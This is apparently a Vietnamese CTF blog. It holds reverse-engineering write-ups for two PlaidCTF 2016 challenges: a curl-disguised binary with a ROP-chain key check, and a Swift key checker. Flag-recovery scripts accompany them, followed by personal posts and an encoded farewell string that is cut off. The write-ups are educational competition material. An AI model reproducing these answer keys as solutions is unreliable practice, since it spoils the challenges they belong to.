Hãy chuẩn bị tinh thần, vì đây là bài 300 điểm của một giải có rating 90.
quite quixotic quest
Reversing (300 pts)
Well yes, it certainly is quite quixotic. (Yes, the flag format is PCTF{} )
Link dự phòng: quixotic
Đề bài là một file ELF 32 bit. Mặc dù đã có trong tay IDA phiên bản hịn (mà cả thế giới đều có), mình vẫn ưa 32 bit. Cười trong ô tô thì vẫn thích hơn là khóc trên xe đạp, right?
Xem danh sách string, dễ thấy nó chính là curl cải trang:
1 2 |
➜ Desktop ./qqq curl: try 'curl --help' or 'curl --manual' for more information |
Mình đã định dùng BinDiff, nhưng thật thô bỉ khi đồng đội của mình chỉ cho mình cái này:
1 |
.rodata:08121788 0000004A C --pctfkey KEY Validate KEY as the PlaidCTF flag for this challenge |
Tức là flag sẽ được nhập qua option –pctfkey. No fun.
1 2 3 |
➜ Desktop ./qqq --pctf "PCTF{đồ ngốc}" Validating key... wrong |
Still no fun, chuỗi Validating key… kia đáng ra cần được che giấu kỹ càng hơn. Mình hoàn toàn cảm thấy bị xúc phạm khi mọi thứ cứ thẳng tuồn tuột như thế.
1 2 3 4 5 6 7 |
.text:08052AAC mov dword ptr [esp], offset aValidatingKey_ ; "Validating key...\n" .text:08052AB3 call curl_mprintf ; Call Procedure .text:08052AB8 mov edx, [ebx+128h] .text:08052ABE mov eax, offset magic_buf .text:08052AC3 mov esp, eax .text:08052AC5 mov eax, edx .text:08052AC7 retn |
Vì EAX = magic_buf, rồi ESP = EAX, nên ESP = magic_buf. Sau khi debug một chút, chúng ta thấy rằng (có vẻ như) chương trình thực thi một rop chain (trỏ bởi magic_buf). Sau khi step over một hồi, chúng ta sẽ gặp badboy, được build từng char một (‘w’, ‘r’, ‘o’, ‘n’, ‘g’) bằng câu lệnh:
1 2 3 4 5 6 7 8 9 10 |
.text:08066CB9 mov eax, offset hostname_cache .text:0804E242 pop edx .text:08095621 mov [eax], edx .text:080E161F inc eax .text:0804E242 pop edx .text:08095621 mov [eax], edx .text:080E161F inc eax .text:0804E242 pop edx .text:08095621 mov [eax], edx ... |
F8 không văn minh lắm, hãy chuyển qua chức năng trace của IDA. Đặt BP ở 0x08052AC7 và chạy lại, bật Instruction Tracing -> F9 -> Badboy -> Mở Trace window (mình quy ước rằng trace log mình post chỉ chứa những câu lệnh mà các bạn cần quan tâm):
1 2 3 4 5 6 7 8 |
00001567 .text:addbyter:loc_805DB7D add ebx, eax ; Add EBX=0000000C 00001567 .text:getparameter+2562 pop edx EDX=00000035 ESP=0818C0E0 00001567 .text:curlx_tvdiff+37 sub edx, ebx ; Integer Subtraction EDX=00000029 PF=0 AF=1 00001567 .text:curlx_tvdiff+3C pop ebx EBX=00000000 ESP=0818C0E8 00001567 .text:_Unwind_GetDataRelBase+6 pop eax EAX=00000094 ESP=0818C0F0 00001567 .text:malloc_usable_size+1E cmovnz eax, ebx ; Move if Not Zero (ZF=0) EAX=00000000 00001567 .text:memcpy:loc_80AD35D mov edi, eax EDI=00000000 00001567 .eh_frame:081887E4 add esp, edi ; Add AF=0 |
Ta thấy EBX = len(key) (mình đang nhập key PCTF{123456}), sau đó EDX -= EBX, tiếp theo EAX = 0x94 và EBX = 0. Nếu cờ ZF = 0 thì lệnh CMOVNZ làm cho EAX = EBX = 0, ngược lại EAX giữ nguyên = 0x94. Sau đó EDI = EAX và ESP += EDI.
Do cờ ZF được quyết định bởi lệnh SUB EDX, EBX, nên kết quả của phép trừ EDX (0x35) cho EBX (len(key)) sẽ ảnh hưởng trực tiếp đến luồng thực thi của chương trình (hoặc ESP += 0, hoặc ESP += 0x94). Như vậy, len(key) = 0x35.
Nhập key mới (PCTF{1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJK}) và trace lại:
1 2 3 4 5 6 7 8 9 10 |
00001572 .text:__underflow:loc_80A40C9 movzx eax, byte ptr [eax]; Move with Zero-Extend EAX=0000007D 00001572 .eh_frame:loc_8187036 pop ecx ECX=00000000 ESP=0818C258 00001572 .text:__guess_grouping+3C add ecx, eax ; Add ECX=0000007D PF=1 00001572 .text:getparameter+2562 pop edx EDX=081CCF10 ESP=0818C26C 00001572 .eh_frame:081887E6 add [edx], ecx ; Add CF=0 PF=1 00001572 .text:__underflow:loc_80A40C9 movzx eax, byte ptr [eax]; Move with Zero-Extend EAX=0000004B 00001572 .eh_frame:loc_8187036 pop ecx ECX=00000000 ESP=0818C258 00001572 .text:__guess_grouping+3C add ecx, eax ; Add ECX=0000004B PF=1 00001572 .text:getparameter+2562 pop edx EDX=081CCF10 ESP=0818C26C 00001572 .eh_frame:081887E6 add [edx], ecx ; Add CF=0 AF=1 |
Đoạn code này làm nhiệm vụ cộng từng ký tự của key vào [EDX]. Khi đã nắm được ý tưởng, ta có thể filter log trace, hoặc đặt BP và F9 để qua nhanh nhưng vẫn đảm bảo việc theo dõi được vòng lặp. Thực tế thì chương trình chỉ tính sum(key[1:]) mà thôi.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
00001572 .text:memcpy+4F mov esi, edx ESI=081CCF10 00001572 .text:__strnlen_sse2+6CE ror byte ptr [edx], 5Fh; Rotate Right OF=1 00001572 .eh_frame:08178748 rol dword ptr [edx], 1; Rotate Left OF=0 00001572 .eh_frame:loc_8187036 pop ecx ECX=01F9933D ESP=0818C29C 00001572 .text:gmtime_r+1B xor [esi], ecx ; Logical Exclusive OR CF=0 AF=0 00001572 .text:__strcpy_ssse3+173C mov eax, edx EAX=081CCF10 00001572 .text:Curl_has:loc_807BD79 mov eax, [eax] EAX=01F9B731 00001572 .text:getcwd+668 xor eax, 0C7FFFFFAh ; Logical Exclusive OR EAX=C60648CB AF=0 SF=1 00001572 .text:memcpy:loc_80AD35D mov edi, eax EDI=C60648CB 00001572 .text:_IO_new_file_seekoff+1A1 mov edx, edi EDX=C60648CB 00001572 .eh_frame:08176458 pop eax EAX=081CCF20 ESP=0819C2D8 00001572 .text:_Unwind_SetIP+8 mov [eax+4Ch], edx 00001572 .text:Curl_multi_content...+12 xor edx, edx ; Logical Exclusive OR EDX=00000000 PF=1 ZF=1 SF=0 00001572 .text:__strnlen_sse2+4C9 lea eax, [eax+4] ; Load Effective Address EAX=081CCF24 00001572 .text:_Unwind_SetIP+8 mov [eax+4Ch], edx 00001721 .text:Curl_md5it push esi ESP=0819C3A8 ... MD5_Update ... MD5Final ... |
Giá trị 01F9933D khi đổi qua DEC sẽ là 33133373, không có gì đặc biệt, mình chỉ nhắc thế thôi. Hãy chuyển sang debug để quan sát stack và các vùng nhớ liên quan. Tại hàm Curl_md5it, tham số thứ 2 trỏ đến 081CCF6C, đúng bằng [eax+4Ch], và chuỗi MD5 kết quả sẽ lưu ở 081CE9C0. Tổng kết lại, đến thời điểm này chúng ta có giả mã sau:
1 2 3 4 5 6 7 8 |
s = sum(key[1:]) s = ror(s, 0x5f) s = rol(s, 1) s ^= 0x01F9933D s ^= 0x0C7FFFFFA [0x081CCF6C] = s [0x081CE9C0] = md5([0x081CCF6C]) |
Tiếp tục:
1 2 3 4 5 6 |
00001728 .text:MD5_Final+1FF pop esi ESI=081CE9C0 ESP=0819C3B4 00001728 .text:smtp_endofresp+53 mov eax, esi EAX=081CE9C0 00001728 .text:Curl_has...:loc_807BD79 mov eax, [eax] EAX=FEBA6E76 00001728 .text:__registe...+7E pop edi EDI=86F4FA3F ESP=0819C3D8 00001728 .text:__readvall+2C xor eax, edi ; Logical Exclusive OR EAX=784E9449 00001728 .text:__strncpy_ssse3+1F80 cmp eax, 5BFFFFFFh ; Compare Two Operands AF=1 |
Mã giả tương ứng:
1 2 3 |
eax = md5_hash[0] eax ^= 0x86F4FA3F eax == 0x5BFFFFFF |
Đoạn code sau sẽ cho ta biết giá trị của s:
1 2 3 4 5 6 7 8 9 10 11 |
for i in xrange(0xFF * 0x34): s = i s = (s & 0xFFFFFF00) | ror(s & 0xFF, 0x5f, 8) s = rol(s, 1, 32) s ^= 0x01F9933D s ^= 0x0C7FFFFFA m = unpack('I', md5(pack('I', s))[:8].decode('hex'))[0] if m == 0x5BFFFFFF ^ 0x86F4FA3F: print 'found:', i, md5(pack('I', s)) break |
1 |
found: 5215 c0050bdd747721646f14ff008c6978b9 |
Input lại một key phù hợp (PCTF{eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeed}).
1 2 3 4 5 6 7 8 9 10 11 |
00001738 .text:getparameter+2562 pop edx EDX=081CCF38 ESP=081AC3F4 00001738 .text:get_scope:loc_80C91EF mov edx, [edx+8] EDX=082045F0 00001738 .text:multi_get...:loc_8061D38 xor eax, eax ; Logical Exclusive OR EAX=00000000 PF=1 ZF=1 00001738 .text:customrequest_helper+65 xor al, [ebx+5E5B30C4h]; Logical Exclusive OR EAX=000000C0 ZF=0 SF=1 00001738 .eh_frame:081768B5 xor [edx], al ; Logical Exclusive OR 00001738 .text:_nl_...+144 inc ebx ; Increment by 1 EBX=A9C1B90A SF=1 00001738 .text:__memset_sse2_rep+497 inc edx ; Increment by 1 EDX=0883B60E SF=0 OF=0 00001738 .text:multi_get...:loc_8061D38 xor eax, eax ; Logical Exclusive OR EAX=00000000 PF=1 ZF=1 00001738 .text:customrequest_helper+65 xor al, [ebx+5E5B30C4h]; Logical Exclusive OR EAX=000000C0 ZF=0 SF=1 00001738 .eh_frame:081768B5 xor [edx], al ; Logical Exclusive OR ... |
Đoạn trên là một vòng lặp, với EDX sẽ trỏ đến key và EBX+5E5B30C4 trỏ đến chuỗi MD5.
Sắp xong rồi, cố lên >:(
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
00001759 .text:Curl_multi_...+12 xor edx, edx ; Logical Exclusive OR EDX=00000000 CF=0 PF=1 ZF=1 00001759 .text:mu...:loc_8061D38 xor eax, eax ; Logical Exclusive OR EAX=00000000 00001759 .eh_frame:08187951 or eax, [ebx+0Ah] ; Logical Inclusive OR EAX=9B5F4690 ZF=0 SF=1 00001759 .eh_frame:loc_8187036 pop ecx ECX=9B5F4690 ESP=081AC948 00001759 .text:__strcmp_ssse3+13E8 sub eax, ecx ; Integer Subtraction EAX=00000000 ZF=1 SF=0 00001759 .text:isnanl+3C or edx, eax ; Logical Inclusive OR 00001759 .text:0805D7B4 add ebx, esi ; Add EBX=0883B5F6 PF=1 ... 00001759 .text:multi...:loc_8061D38 xor eax, eax ; Logical Exclusive OR PF=1 ZF=1 00001759 .eh_frame:08187951 or eax, [ebx+0Ah] ; Logical Inclusive OR EAX=0144120F ZF=0 00001759 .eh_frame:loc_8187036 pop ecx ECX=17541D0F ESP=081AC964 00001759 .text:__strcmp_ssse3+13E8 sub eax, ecx ; Integer Subtraction EAX=E9EFF500 CF=1 SF=1 00001759 .text:isnanl+3C or edx, eax ; Logical Inclusive OR EDX=E9EFF500 CF=0 00001759 .text:0805D7B4 add ebx, esi ; Add EBX=0883B5FA CF=0 ... |
Debug để thấy giá trị các biến, ta thấy rằng chương trình thực hiện việc lấy từng dword trong key (sau khi đã xor với chuỗi MD5), rồi trừ cho ECX, và OR vào EDX. Khi bắt đầu, EDX = 0. Các giá trị của ECX lần lượt như sau:
1 |
ecx = [0x9b5f4690, 0x17541d0f, 0x5F9E4B1B, 0xCD0C58E0, 0xA95460AC, 0x034F1E1C, 0x6CA02530, 0xE61D02BD, 0xBE5435B4, 0x3B4D1B15, 0x668F7B1D, 0xD81B1AF9, 0xB3646CB4, 0x00000009] |
1 2 3 4 5 6 |
00001759 .text:_IO_default_showmanyc mov eax, 0FFFFFFFFh EAX=FFFFFFFF 00001759 .text:isinfl+55 and eax, edx ; Logical AND SF=1 00001759 .text:smtp_multi_statemach+25 pop ebx EBX=FFFDF620 ESP=081ACAD0 00001759 .text:malloc_usable_size+1E cmovnz eax, ebx ; Move if Not Zero (ZF=0) EAX=FFFDF620 00001759 .text:memcpy:loc_80AD35D mov edi, eax EDI=FFFDF620 00001759 .eh_frame:081887E4 add esp, edi ; Add ESP=0818C108 CF=1 PF=0 SF=0 |
Ở đây lại là một trick tương tự mà mình đã nhắc đến phần đầu bài, khi mà cờ ZF sẽ ảnh hưởng đến luồng thực thi của chương trình. Cờ ZF được quyết định ở câu lệnh AND EAX, EDX, và vì EAX = 0xFFFFFFFF, EDX cần bằng 0 để cờ này được bật.
Ta nhớ rằng EDX là phép OR của mọi giá trị EAX – ECX, do đó để EDX = 0 thì mọi hiệu EAX – ECX phải bằng 0, hay nói cách khác, EAX phải bằng ECX. Đoạn code sau, như mọi khi, mang lại cho chúng ta flag:
1 2 3 4 5 6 7 8 |
h = 'c0050bdd747721646f14ff008c6978b9'.decode('hex') ecx = [0x9b5f4690, 0x17541d0f, 0x5F9E4B1B, 0xCD0C58E0, 0xA95460AC, 0x034F1E1C, 0x6CA02530, 0xE61D02BD, 0xBE5435B4, 0x3B4D1B15, 0x668F7B1D, 0xD81B1AF9, 0xB3646CB4, 0x00000009] flag = '' for i in xrange(len(ecx)): hi = i % 4 s = pack('I', unpack('I', h[hi * 4:hi * 4 + 4])[0] ^ ecx[i]) flag += s print flag[:0x35] |
Nếu bạn thắc mắc tại sao với cách làm hư cấu thế này, mà mình lại có thể trở thành người giải ra thứ hai (:”>), thì bạn thắc mắc đúng rồi đấy. Trong lúc thi mình không hề dùng cách này. Hihi.
[Plaid CTF 2016] quick (Re175)
Tôi cảm thấy mình cần phải thức tỉnh, khi mà hàng ngày vẫn có biết bao lượt truy cập vào blog này, trong khi last post của nó đã cách đây hơn 1 năm. Tôi thật tệ.
quick
Người lười như tôi thường sau khi down đề về sẽ mở nó bằng notepad, xem mấy byte đầu thấy ELF thì tôi sẽ kéo nó vào IDA 32 bit, nếu sai tôi lại kéo nó sang IDA x64. Dạo trước có đợt tôi quyết tâm thoát lười, sau khi xem vài byte đầu bằng notepad tôi vẫn ráng xem thêm vài dòng bên dưới, nếu thấy x86-64 thì chỉ phải kéo một phát vào IDA là đúng luôn. Lâu không tập, tôi mất cmn luôn kỹ năng ấy.
Ok, bài này là ELF x64. Xem danh sách hàm trong IDA bạn sẽ thấy nó dùng Swift, để chạy nó chúng ta cần file bị thiếu bên dưới (hãy dùng Ubuntu 14.04 nếu muốn thành người văn minh):
1 2 3 4 5 6 7 8 |
➜ Desktop ldd ./quick linux-vdso.so.1 => (0x00007fff4f5a3000) libswiftCore.so => not found libstdc++.so.6 => /usr/lib/x86_64-linux-gnu/libstdc++.so.6 (0x00007fa36792c000) libm.so.6 => /lib/x86_64-linux-gnu/libm.so.6 (0x00007fa367626000) libgcc_s.so.1 => /lib/x86_64-linux-gnu/libgcc_s.so.1 (0x00007fa367410000) libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fa36704b000) /lib64/ld-linux-x86-64.so.2 (0x00007fa367c30000) |
Hàm main khá dài, tôi không biết nó làm trò con bò gì, nhưng hàm check key nằm ở 0x403660. Nó cũng không ngắn gì cho cam. Chúng ta có 2 mảng 33 phần tử, kiểu thế này (tôi không paste code IDA ở đây vì tôi không thích):
1 2 |
arr1 = [0x81, 0x74, 0x87, 0x79, 0xB0, 0x6A, 0xAA, 0xA7, 0x68, 0x94, 0xA4, 0x7B, 0xAF, 0x89, 0xD4, 0xD1, 0x92, 0xBE, 0x94, 0xD8, 0x92, 0xCC, 0xDA, 0xD1, 0xD3, 0xA9, 0xD3, 0xAA, 0xEC, 0xA8, 0xDD, 0xEF, 0xFA] arr2 = [0x50, 0x43, 0x8A, 0x64, 0xED, 0xA6, 0xAB, 0x93, 0xCC, 0xEB, 0xC2, 0x9A, 0xFA, 0x6A, 0xAB, 0x93, 0xCC, 0xEB, 0x6A, 0xBB, 0x62, 0x33, 0xD1, 0xF5, 0xC2, 0x9A, 0xFA, 0x6A, 0xBB, 0x62, 0x33, 0xD1, 0xD7] |
Hàm check này cần trả về 1, và chúng ta thấy nó trả về 0 ở đây:
1 2 3 4 5 6 7 8 9 10 11 |
_TTSg5Vs5UInt8___TFSag9subscriptFSix(&v70, v60, v66); v14 = &v69; v16 = v70; _TTSg5Vs5UInt8___TFSag9subscriptFSix(&v69, v60, v65); if ( v16 != v69 ) { swift_release(v113); swift_release(v65); swift_release(v66); return 0; } |
Bạn sẽ thắc mắc vì sao tôi không rename mấy cái biến trên. Câu hỏi rất hay, tôi xin phép không trả lời.
Dễ thấy rằng nó so sánh v16 với v69. Mà v16 = v70, v70 lấy từ câu lệnh (google “subscript swift” nếu bạn muốn):
1 |
_TTSg5Vs5UInt8___TFSag9subscriptFSix(&v70, v60, v66); |
v66, thật tình cờ, được quyết định ngay ở đầu hàm check – là kết quả trả về của hàm 0x403600. Trong hàm này có 2 hàm con, hãy để ý tên các hàm import từ Swift để suy ra chức năng của nó. Tôi tin bạn sẽ làm được, chúng ta đã đọc Conan cả chục năm rồi. Cụ thể: 0x402810 làm nhiệm vụ sort input của ta (bé đến lớn, dùng …ComparablerS_4sortfT_GSaWxS0_S1___, tên dài lắm), còn 0x403050 sẽ tính tổng từng cặp phần tử trong *input của ta* và *input của ta_đã sort*, kết quả chính là v66.
Tương tự như vậy, v69 lấy từ v65, v65 chính là arr1. Và tóm lại, 2 mảng arr1 và mảng v66 phải bằng nhau.
1 2 3 4 5 6 |
def check1(s): s_sorted = s[::] s_sorted.sort() for i in xrange(len(arr1)): assert s[i] + s_sorted[i] == arr1[i] |
Để vượt qua bước check này, bạn chỉ cần 5 phút. Để bỏ cuộc. Hãy sang phần check thứ hai.
Vẫn với skill dò ngược thần thánh, bạn sẽ thấy rằng nó so sánh một mảng x với arr2. Tất nhiên, quan trọng là mảng x được tính thế nào.
1 2 3 4 5 6 7 8 9 10 |
_TFSag9subscriptFSix(&v72, v54, v57, &TMVs9Character); v52 = v72; v36 = v73; v51 = sub_402AD0(v72, v73); if ( ~v36 & 1 ) swift_release(v52); v71 = sub_403510(v111, v51); v34 = &v71; _TTSg5Vs5UInt8___TFSa6appendfxT_(&v71, &v112); v111 = v51; |
Ở đoạn code trên, v112 chính là mảng x, v57 là *input của ta*, 0x403510 là hàm ror, 0x402AD0 tôi quên cmn rồi (hình như nó chả làm cái khỉ gì). Chuyển sang python:
1 2 3 4 5 |
def check2(s): n = 0 for i in xrange(len(arr2)): assert ror(s[i], n & 7) == arr2[i] n = s[i] |
Nhìn qua thì chúng ta cảm giác rằng check2 dễ hơn check1, nhưng nếu thử code thì bạn sẽ thấy là nó không sai. Đoạn code này sẽ cho ta flag:
1 2 3 4 5 6 |
n = 0 s = [0] * 33 for i in xrange(33): s[i] = rol(arr2[i], n & 7, 8) n = s[i] print ''.join(map(chr, s)) |
Kiểm tra lại flag với check1, thấy đúng luôn. Kỳ lạ.
New Post, New Year ^_^
Tôi từng có một lời nguyền là trừ khi giành giải nhất một cuộc thi nào đó, chứ không thì tôi không writeup gì hết. Nói gì thì nói, thằng về đầu tiên nói sao cũng được, nói sao cũng đúng, những thằng còn lại rồi cũng sẽ bị quên lãng mà thôi.
Tôi đùa đấy.
Cái blog một thời dễ thương này, bỗng dưng trở thành cái web chết, nửa năm không cất tiếng hân hoan, chẳng phải vì tôi hết cái để viết, mà chủ yếu vì tôi thấy không cần phải viết nữa. Thế quái nào mà trước giờ tôi cứ nghĩ mình vẫn còn trẻ, 9x thì là còn trẻ, rồi bỗng nhìn xung quanh, đứa này đứa kia cũng đã gọi tôi là anh cả rồi. Gặp đứa nhỏ nhắn thì sinh năm 94, mà gặp đứa cao to thì sinh năm 96. Thế cho nên, cái tuổi của tôi không còn được chú ý vì cái sự gọi là trẻ trung nữa, mà giờ người ta chỉ dành mỹ từ đó cho tụi nhóc kia thôi, cái tụi ở trên gọi tôi bằng anh ấy.
Còn về CTF, giờ nói như một bài rap ngày xưa tôi hay nghe, thì các team “mọc lên như cây nấm” vậy. Người đông, team đông, lăn xả nhiều. Hồi giữa năm 2013, tôi lúc đó có thể cày ngày cày đêm mà chẳng vì cái gì cả, trên xe bus có thể lôi quyển vở ra gạch gạch xóa xóa để làm một bài crypto của EMC. Nay thức đến 1h, 2h là đã bắt đầu suy nghĩ, nào là sáng mai dậy sớm sẽ thấy mệt, sáng mai dậy sớm sẽ thấy mỏi, sáng mai đến công ty sẽ nhận ra mình nông nổi và lỡ có ngủ quên thì rất có thể là bị đuổi.
Tôi ít mộng mơ hơn, ít bất chấp hơn, mặc dù nói thật ra thì vẫn chỉ là dạng “trái tim còn muốn yêu nhưng lý trí nó không cho phép”. CTF tôi thấy nó hay thật, nhưng nhiều lúc nó cứ đều đều quá, đánh đố quá, nên sinh chán. Lại cả, CTF bây giờ như một cuộc thi toàn vũ trụ, không phân hạng 1, hạng 2, hạng 3 như bóng đá (về thể thao tôi biết mỗi trò này), nên có cái cảnh là team mạnh thì nhất hoài, còn team chưa mạnh dẫu cố mãi cũng không gặt được thành quả. Kiểu như cho U19 VN đấu với Real ấy. Thua 10 trận còn đá tiếp được, chứ thua đến 99 trận rồi thì chắc cũng chỉ đá nốt cho xong, chứ niềm tin là cạn rồi.
Mà đó là nói về vụ thành tích, chứ về mặt học tập tôi nghĩ CTF có nhiều cái hay, không phủ nhận được. Đợt tôi đăng ký môn học chậm, trường đóng rồi, may nhờ một tẹo sách vở mảng Web mà qua được, rồi nay mới có thể ra trường. Tôi cảm ơn nhiều lắm. Công việc hàng ngày, có tí CTF trong đầu, cũng tự tin hơn hẳn. Tôi nghĩ nếu tự tin hơn thì chắc cũng đẹp trai hơn, cuốn hút con gái hơn. Như hôm trước có ông tôi thấy rõ là khù khờ, đùng một cái kêu cưới vợ, rồi giải trình ra chuyện tình cảm đến tầm gần chục năm. Kỳ diệu.
…
Vừa đi liên hoan về, người cứ lâng lâng, hơi hơi say. Chẳng biết là tôi có còn viết thêm bài nào không nữa. Chẳng biết tôi có còn thi được mấy giải CTF nữa. Tính tôi ưa nghĩ nhiều, sẵn đang miệt mài trong mớ cảm xúc, tôi viết lại vài dòng, lúc tỉnh rồi sợ ngại ngày ngại kia, không viết được, mấy năm sau thì quên mất. Là quên thật, tôi bị suốt.
Tôi rất cảm ơn anh **censored**, dù chả họ hàng gì nhưng bên tôi rất lâu, từ những ngày tôi không có gì cả, cho đến tận lúc tôi trắng tay. Rồi cả khi dìu dắt tôi vào **censored** (xong bỏ đó), tạo cơ hội cho tôi biết đến CTF. Có một giai đoạn tôi không hợp tính của **censored**, nhưng về cơ bản thì rồi cũng quen quen. FA có hai kiểu FA, một kiểu là người tốt, một kiểu là người xấu. Anh là kiểu người tốt, nhưng khá xấu.
Tôi rất cảm ơn tập thể **censored**. Cũng phải gọi là từng ăn nằm với nhau, kề vai sát cánh bên nhau mới đủ. Tôi còn nhớ như in lần đi team building của công ty, ngồi sau xe máy đứa bạn mà tôi vẫn lôi con **censored** ra check FB, chat chit loạn cả lên để theo dõi mọi người thi một giải CTF. Hồi đó tôi mê lắm, xin nghỉ team building để ở nhà thi mà không được, tối trước khi đi vẫn còn cố nhắn gửi mọi người… Hờ hờ hờ… ngày ấy sao mà đẹp quá.
Tôi rất cảm ơn tập thể **censored**. Giải ba **censored** đối với tôi có giá trị hơn giải nhất **censored** rất nhiều. Tôi luôn thừa nhận rằng chúng tôi chỉ có thể giành giải ba là cao, nhưng không thể nói dối rằng tôi không có gì hối tiếc. Tôi thực sự đã có thể có được một kết quả tốt hơn. Nhưng cuộc sống là vậy, quá khứ luôn có vài hoạt cảnh khiến chúng ta muốn quay về và thay đổi nó. Chim sẻ từng đổi nick thành “Giải ba Thái Nguyên” sau khi không thể vô địch, chắc tôi cũng đổi sang “Giải ba **censored**” luôn. Ôi, mới đó mà tôi đã yêu Chim sẻ được gần 5 năm rồi T_T
…
Nếu hỏi tôi trong suốt chặng đường CTF của mình, kỷ niệm nào là đẹp nhất, thì tôi nghĩ đó là giải **censored** **censored**. Cuộc thi này chắc ít người để ý, ít người quan tâm, nhưng đối với tôi, đó là những ngày được đắm chìm trọn vẹn trong nó và rồi nhận được kết quả xứng đáng. Một cuộc thi quyến rũ, những bài thi kích thích (trừ vài bài tương đối gồ ghề, nham nhở) cùng một giải thưởng nhỏ xinh. Tôi từng ao ước sẽ tổ chức được một giải CTF cho các bạn thuộc hạng 2, hạng 3 (tức không phải hạng 1), đề thi dễ thương, có giải thưởng, có tiền, có cúp, có giấy khen. Mỗi cái một chút thôi, nhưng là một người từng đi thi, tôi biết nó có sức khích lệ lớn lao lắm. Xin được giữ ước mơ này lại cho các thế hệ đời sau, dù chắc là cũng không còn mấy cơ hội để được gọi tên nhau…
…
Good game, well played. Chẳng mấy mà đã tới lúc phải tính đến những chuyện khác rồi. Cảm ơn CTF vì tất cả (giải thưởng) nó đã mang lại cho tôi. Xin chúc cho những người từng là đồng đội của tôi gặt hái được nhiều thành công hơn nữa, bay thật xa, xa, xa hơn nữa…
“Anh không buồn vì mọi thứ, nhưng anh sẽ buồn vì mất em
Anh chỉ hối tiếc vì ngày đó… sao không nắm lại mà phải buông…”
Repost: RE Driver Checker v2.7.4 by P.E Onimusha & Unregistered !
Rất cảm ơn anh Kiên đã cho em thấy là ngày xưa em viết văn như thế nào, mới đó mà cũng đã 4 năm, đầu óc ngày một ngu đi còn các chi thì vẫn gầy nhẳng…
Nhiều cái, nghĩ cho cùng thì cũng chỉ là thú tiêu khiển, bóng đá, nhảy dây, breakdance, hát hò, crack, ctf, học hành… chẳng đi đến đâu cả, leo lưng chừng xong lại rớt bịch xuống đất. Đến tuổi rồi thì cũng như người ta, ham yêu đương, lấy vợ, đi làm kiếm lương, mang về mua gạo, mua thịt, mua chai dầu ăn để đun nấu, mua cái chổi để quét nhà, mua cái ca để uống nước.
Good game, well played…
https://kienmanowar.wordpress.com/2014/07/15/re-driver-checker-v2-7-4-by-p-e-onimusha-unregistered/
P.S: (Lỗi bảo mật được che giấu suốt 4 năm) Bài này theo em nhớ thì thằng Unreg nó sang tận nhà em để hint. Hoàn toàn là lỗi của nó, no fun.
byectf
Chúc mừng năm mới tới tất cả những bạn đang đọc mấy dòng chữ này (bạn nào chưa đọc thì đến lúc đọc sẽ chúc sau).
Một năm đã trôi qua xét theo tờ lịch, và nửa năm đã trôi qua xét theo sự sống còn của site này. Mình xin phép thông báo rộng rãi đến toàn thể các bạn quan tâm, là mình sẽ cho nó nghỉ ngơi dưỡng sức, thời điểm trở lại chưa biết trước (vì mình dạo này bu di quá, không lo cho nó được nữa, chia tay sớm bớt đau bớt khổ)
Trong giai đoạn thiếu hụt tình cảm nghiêm trọng này, thật may mắn là mình đã kịp tìm ra một nơi chốn vô cùng bổ ích khác, đó là:
VGxSWk1FNTZZelJPVkUweFRucGFhVTE2UlRCT2FsSnNUbFJSTVZsVVZURk9WR013VG5wVmVVNVVR VEZaVkZVelRYcEZNbGxVV1RGTwpSRmt4VFdwak1VNXFUVEJPZWxFeVRtcG5NUXBPYWxVd1RrUlZl azFxVlRGT2JVMHhUV3BTYlU1VVVUSmFSRkV5VG5wTk1VMTZXbXhPClIwVXhUbFJaZVU1RVdUQlpW Rmw0VGxSUk1VNXFWVEZOZWtVeVRYcFZNazVYUlRGT1ZGVXhDazV0U1hwUFZGVXpUbFJKZWsxRVRY aE4KZWsweFRtcFJNMDE2VlROT2VsVXpUbTFKZWs1VVVUSk9SMVV4VG1wVk1rNVVTWGRaVkZVeVRr UlZNVmxVV1hoT1ZGa3lXV3BXYUU1VQpXVElLVGxSYWFrNVVTVEZQVkZsNlRrUlZNVmxVVW14T1ZF a3lXbFJSZVU1Nlp6Rk9hbFV6VFhwRmVrNUVWVEJPZW1NelRVUlpOVTVVCldURk9SRkY1VFhwVk1V NXFVVE5PZWxFeFRYcFZNZ3BPYlVsNlRVUmpNMDVIVlRGT2FsVXlUbFJqTVU1cVVURk9la0V5VFZS Vk5VNVUKWTNwTlZGSnNUbXBSZWsxVVZYbE9lbEV5VFhwUk5FNUhSVEJhVkZVeFRsUm5NRTFxVlhk T1ZHc3hDazU2WXpST1ZGa3lUa1JOZUU1VQpTVE5OYWxVeFRtMU5NMDFFV21wTlIwVXlUVlJrYUU1 RVdUQk9hbFV5VG0xTk1VMXFVbWxPVkZFeVdrUlZNazU2U1RGT2FsVTBUbXBuCk1VNVVWVElLVFhw Tk1FMXFWVEJPVkdzeFRtcFZNVTE2UlRGT2FsVXlUbGRGTVU1VVZYaE9iVWw2VDFSWk5FNXFTVEJP YW1OM1RucFoKTVU1cVVUTk9lbEV4VFhwWmVVNXRTWHBOVkZVeVRrZFZNUXBPVkZVeVRsUm5NazFx VlROT2FtY3hUVVJSZWs1dFRURlBWR016VGxSWgpNVTlFV1RST1ZGVXlUV3BSTWs1SFJUSk5WRlpv VGxSWk1VNVVUWGhPYWxFd1RtcFdhRTVVVlRGTlZGcHBDazE2VlRKUFJFSm9UbXBKCk1FNTZZek5O ZWtFeFRtcFJNMDU2WnpGTmVsVXhUbTFKZWsxVVZUSk9SMVV4VGtSV2FFNVhSVEpPVkZwcVRrZEZN VTFFVm1oT1ZHTjYKVFZSU2JFNXFWVEFLVG1wVmVVNTZVVEpOZWxFeVRsZEZNRnBVV1hoT01rVXhU bXBSTlU1VVdUSlplbFY1VGtkWk1VNUVUWGhPUjBVdwpUbnBaZUUxNlRUSlBSRkV3VG1wRk0xbFVW VEpPUkZreFRtcGFhZ3BPYW1jelRucFZNVTVFV1RGWlZGRXpUbXBGTTFsVVVYbE9WRlV5ClRXcFZO RTVFU1RCWmFsVXdUbFJaTVU1VVRURk9WRWt4VG1wVk1rNTZVWGRaVkZreFRrUlZlazVFVW1sT1Yw VXhDazU2WXpST2Vra3kKVGxSUk1rNVVTVE5PUkZsNlRrUlpNRmxVVW14T1IxRXdUa1JSTVUxNlNU Rk9WRnBxVGxSSk1GcHFWVEJOZWtreFRtcGplazVVV1RGUApSR04zVGxSVk1rMXFWVEFLVGtSWk1V 